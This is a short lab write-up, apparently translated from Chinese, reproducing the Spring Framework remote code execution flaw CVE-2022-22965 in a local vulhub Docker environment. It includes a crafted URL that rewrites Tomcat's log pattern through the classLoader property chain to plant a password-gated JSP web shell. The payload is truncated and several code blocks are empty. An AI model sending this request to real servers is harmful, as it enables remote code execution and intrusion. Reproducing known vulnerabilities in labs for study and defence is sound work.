0x01 Vulnerability Introduction
Spring Framework is an open source application framework. Its original intention is to reduce the complexity of application development. It has a layered architecture, allows users to select components, and provides a useful framework for J2EE application development. When Spring is deployed on JDK9 and above, remote attackers can exploit this vulnerability to write malicious code to cause remote code execution.
0x02 Vulnerability Reappearance
vulhub/spring/CVE-2022-22965 at master · vulhub/vulhub · GitHub
Use the command in the current directory: docker-compose up -d to open the environment with one click:
See that the current port is open at 8080:
After opening the page, you can see that the current service is up:
http://127.0.0.1:8080/
Follow the author's link:
http://127.0.0.1:8080/?name=Bob&age=25
The page appears:
Then according to the prompt, construct the request address: ( 方法不唯一)
http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25After the request is issued, a transformation is required:
The red part is replaced with:
| 1 2 3 4 5 |
|
The effect is shown in the figure below:
Then visit:
| 1 |
|
Just execute the command!
Note that multiple executions here will continuously write files to the log, please do not operate frequently!